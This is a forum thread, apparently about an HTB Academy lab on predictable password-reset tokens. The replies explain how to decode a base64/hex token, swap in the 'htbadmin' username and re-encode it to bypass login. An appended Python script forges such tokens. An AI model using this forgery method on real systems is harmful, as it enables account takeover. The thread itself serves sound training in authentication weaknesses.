Hello everyone. I have problems with question 2 in the “Predictable Reset Token” Broken Authentication module. I can’t understand how to log in as htbadmin (htbuser is ok, it’s very easy).
I think I tried everything: the php_mt_seed script to find something with mt_rand() - no results.
Maybe this temp password is some hash, but it’s not.
I noticed that the temp password value uses only “0-9” and “a-f” characters, but this didn’t help me.
Hi
You have to understand how the reset password token is generated. Then tamper with it for the htbadmin user. Once you’ve got it, just bypass the login (look at the inspect page).
You have to decode the base64 string given by the htbuser password reset. Tamper with it as htbadmin:<rest_of_string_here>:<…>, then encode it again (hex --> base64) and copy the cookie in order to bypass the login.
It also helps to encode the already-decoded token back, to be sure that the resulting value is the same as the one given by “Show temporary password for htbuser”. Then encode the token for htbadmin using the same approach.
Base64-decoding the temp password for htbuser gives just numbers. How am I supposed to tamper with it? I thought decoding it would result in something like htbuser####, and I would just change htbuser to htbadmin#### and encode it.
I am kind of stuck here, any tips?
A prerequisite for solving this one is to be able to spot different types of encoded strings.
Once you are aware of the different ways of encoding (base64, ASCII) and the different output formats (hex, with or without spaces), it’s really straightforward.
I did it manually without a script (but with online tools).
Show the htbuser temporary password.
Inspect it - it looks a lot like a base64 encoded string.
Inspect the decoded base64 string - this is where I had to learn about hex formatting without spaces, since it didn’t look like anything I knew so far.
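The decode/tamper/re-encode chain that the replies above describe (base64 -> hex without spaces -> "user:..." text, then back again), as an added example written for this page; it is not code from HTB Academy or from any poster in the thread. The sample token is constructed here, and the two fields after the username are placeholders, since the thread only shows that part as <rest_of_string_here>:<…>. The round-trip check is the one suggested above: re-encode the decoded token and confirm it matches the original before forging one for another user.

```python
import base64
import binascii

# Constructed sample plaintext, NOT the real module's token. The layout
# "user:field:field" and the placeholder field values are assumptions for
# illustration only; the thread does not reveal what follows the username.
SAMPLE_PLAINTEXT = b"htbuser:00000000:ffffffff"


def build_token(plaintext: bytes) -> str:
    """Encode text -> hex (lowercase, no spaces) -> base64."""
    hex_text = binascii.hexlify(plaintext)  # b"687462757365723a..." for the sample
    return base64.b64encode(hex_text).decode("ascii")


def looks_like_hex(data: bytes) -> bool:
    """True if data is an even-length run of 0-9/a-f characters, i.e. hex without spaces.
    This is what the 'just numbers' / '0-9 and a-f' observations in the thread describe."""
    return len(data) > 0 and len(data) % 2 == 0 and all(c in b"0123456789abcdefABCDEF" for c in data)


def decode_token(token: str) -> bytes:
    """Reverse the chain: base64 -> hex string -> original text."""
    hex_text = base64.b64decode(token, validate=True)
    if not looks_like_hex(hex_text):
        raise ValueError("base64 payload is not a plain hex string; different encoding chain")
    return binascii.unhexlify(hex_text)


def forge_token(token: str, old_user: bytes, new_user: bytes) -> str:
    """Decode a known-good token, verify the chain round-trips, swap the username, re-encode."""
    plaintext = decode_token(token)
    if build_token(plaintext) != token:
        raise ValueError("round trip mismatch: chain is not base64(hex(text))")
    if not plaintext.startswith(old_user + b":"):
        raise ValueError("decoded token does not start with %r:" % old_user)
    forged = new_user + plaintext[len(old_user):]  # keep everything after the username as-is
    return build_token(forged)


if __name__ == "__main__":
    original = build_token(SAMPLE_PLAINTEXT)
    print("sample token:   ", original)
    print("base64-decoded: ", base64.b64decode(original).decode())
    print("hex-decoded:    ", decode_token(original).decode())
    forged = forge_token(original, b"htbuser", b"htbadmin")
    print("forged token:   ", forged)
    print("forged decodes: ", decode_token(forged).decode())
```

Against the real exercise, replace SAMPLE_PLAINTEXT with the actual decoded value and keep the round-trip check: if re-encoding the decoded string does not reproduce the token you were shown, the encoding chain is not the one you assumed and the forged cookie will not be accepted.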